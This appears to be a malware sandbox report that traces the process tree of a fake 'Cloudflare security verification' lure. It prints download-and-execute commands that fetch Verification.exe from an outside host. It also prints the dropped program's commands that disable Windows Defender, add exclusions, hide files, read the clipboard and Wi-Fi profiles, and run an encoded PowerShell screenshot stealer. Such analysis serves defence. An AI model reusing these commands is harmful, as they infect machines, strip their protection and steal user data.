  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5972,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5988 /prefetch:1
  2⤵
  PID:1968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5624,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5800 /prefetch:1
  2⤵
  PID:1200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=212,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3264 /prefetch:8
  2⤵
  PID:1504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3276,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3320 /prefetch:8
  2⤵
  PID:5780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3268,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3204 /prefetch:8
  2⤵
  PID:4968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=3440,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1108 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4640,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5732 /prefetch:8
  2⤵
  PID:3824

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cmd /c curl.exe -k -Ss "gurucharanlol.vercel.app/Verification.exe" -o "%APPDATA%\Verification.exe" && start "" "%APPDATA%\Verification.exe" # Cloudflare Security Verification – Please confirm you are human: 5321
1⤵
PID:5308
- C:\Windows\system32\cmd.exe
  cmd /c curl.exe -k -Ss "gurucharanlol.vercel.app/Verification.exe" -o "C:\Users\Admin\AppData\Roaming\Verification.exe"
  2⤵
  PID:5348
- - C:\Windows\system32\curl.exe
    curl.exe -k -Ss "gurucharanlol.vercel.app/Verification.exe" -o "C:\Users\Admin\AppData\Roaming\Verification.exe"
    3⤵
    PID:5884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cmd /c curl.exe -k -Ss "gurucharanlol.vercel.app/Verification.exe" -o "%APPDATA%\Verification.exe" && start "" "%APPDATA%\Verification.exe" # Cloudflare Security Verification – Please confirm you are human: 5321
1⤵
PID:5844
- C:\Windows\system32\cmd.exe
  cmd /c curl.exe -k -Ss "gurucharanlol.vercel.app/Verification.exe" -o "C:\Users\Admin\AppData\Roaming\Verification.exe"
  2⤵
  PID:2928
- - C:\Windows\system32\curl.exe
    curl.exe -k -Ss "gurucharanlol.vercel.app/Verification.exe" -o "C:\Users\Admin\AppData\Roaming\Verification.exe"
    3⤵
    PID:3492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:3940
- C:\Windows\system32\cmd.exe
  cmd /c curl.exe -k -Ss "gurucharanlol.vercel.app/Verification.exe" -o "C:\Users\Admin\AppData\Roaming\Verification.exe"
  2⤵
  PID:464
- - C:\Windows\system32\curl.exe
    curl.exe -k -Ss "gurucharanlol.vercel.app/Verification.exe" -o "C:\Users\Admin\AppData\Roaming\Verification.exe"
    3⤵
    PID:2804

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c curl.exe -k -Ss "gurucharanlol.vercel.app/Verification.exe" -o "C:\Users\Admin\AppData\Roaming\Verification.exe" && start "" "C:\Users\Admin\AppData\Roaming\Verification.exe" # Cloudflare Security Verification – Please confirm you are human: 5321
1⤵
PID:5952
- C:\Windows\system32\curl.exe
  curl.exe -k -Ss "gurucharanlol.vercel.app/Verification.exe" -o "C:\Users\Admin\AppData\Roaming\Verification.exe"
  2⤵
  PID:2340

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" Invoke-WebRequest -Uri "https://gurucharanlol.vercel.app/Verification.exe" -OutFile (Join-Path $env:TEMP "Verification.exe") ; Start-Process -FilePath (Join-Path $env:TEMP "Verification.exe") -Wait -Verb RunAs" # Cloudflare Security Verification –
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1752
- C:\Users\Admin\AppData\Local\Temp\Verification.exe
  "C:\Users\Admin\AppData\Local\Temp\Verification.exe"
  2⤵
  - Executes dropped EXE
  PID:3144
- - C:\Users\Admin\AppData\Local\Temp\Verification.exe
    "C:\Users\Admin\AppData\Local\Temp\Verification.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Verification.exe'"
      4⤵
      PID:5764
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Verification.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4712
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:3440
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:908
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5312
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:3696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:2216
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:4260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:6024
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:1148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4564
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5612
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Verification.exe""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:1688
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Verification.exe"
        5⤵
        Views/modifies file attributes
        
        PID:1732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
      4⤵
      PID:4720
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5892
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3984
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4816
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:5164
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:4088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:1692
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:5256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1972
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4572
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:412
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4100
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:5856
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:5052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      PID:672
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:5460
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3240
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rr4c0hfb\rr4c0hfb.cmdline"
        6⤵
        
        PID:224
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E64.tmp" "c:\Users\Admin\AppData\Local\Temp\rr4c0hfb\CSCB8A76AFD17FE44EA94353BF9524F1F9E.TMP"
        7⤵
        
        PID:5936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:3852
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:2720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5176
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:5700
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:372
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1560
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4576
